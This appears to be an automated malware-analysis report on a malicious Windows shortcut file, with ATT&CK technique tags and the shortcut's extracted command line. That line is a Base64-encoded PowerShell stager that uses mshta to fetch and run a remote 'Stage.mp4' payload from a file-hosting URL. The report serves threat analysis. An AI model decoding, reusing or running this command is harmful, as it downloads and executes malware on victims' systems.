Malicious

3bf12a065c4bf9abfc4985443bc66915

LNK File | MD5: 3bf12a065c4bf9abfc4985443bc66915 | Size: 3.09 KB | application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
File Structure
3bf12a065c4bf9abfc4985443bc66915
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAF4AbQBeAF4AcwBoAHQAXgBhAF4AIABoAHQAXgBeAHQAXgBeAHAAXgBzADoALwBeAF4AXgAvAGMAXgBvAF4AbABeAF4AZAAtAGUAXgBeAF4AdQAtAGEAXgBeAF4AZwBsAF4AXgAtADEALgBeAF4AZwBvAGYAaQBsAF4AZQBeAC4AXgBpAG8ALwBeAF4AXgBeAGQAXgBeAF4AXgBvAF4AdwBuAF4AXgBeAGwAbwBeAF4AYQBkAF4AXgBeAC8AZABpAF4AXgBeAF4AcgBlAF4AXgBeAGMAdABeAC8AXgBeAF4AZgBeAF4AXgA3AGIAMQBhADgAZQA2AC0ANABeAF4AXgBeADcAZQBlAC0ANABeAF4AXgA3AF4AZABeAF4AYQAtAF4AOQBeAGMAXgBeAF4AXgAyAF4AXgBeADIALQBeAF4AXgAzAGIAMwAwADAAMwAyAF4AZQAyADgAZgBeAF4AMwAvAFMAdABeAF4AXgBeAGEAZwBeAGUALgBtAHAANABeAF4AXgBeACcALgByAGUAcABsAGEAYwBlACgAJwBeACcALAAnACcAKQA7AGkAZQB4ACAAKABnAGMAYgApAA==

Deobfuscated PowerShell

-e "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"

Characteristics
No malware configuration was found at this point.
Artefacts
Name | Location
LNK: Command Execution | 3bf12a065c4bf9abfc4985443bc66915
Deobfuscated PowerShell | 3bf12a065c4bf9abfc4985443bc66915 > LNK CommandLine > [PowerShell Command]
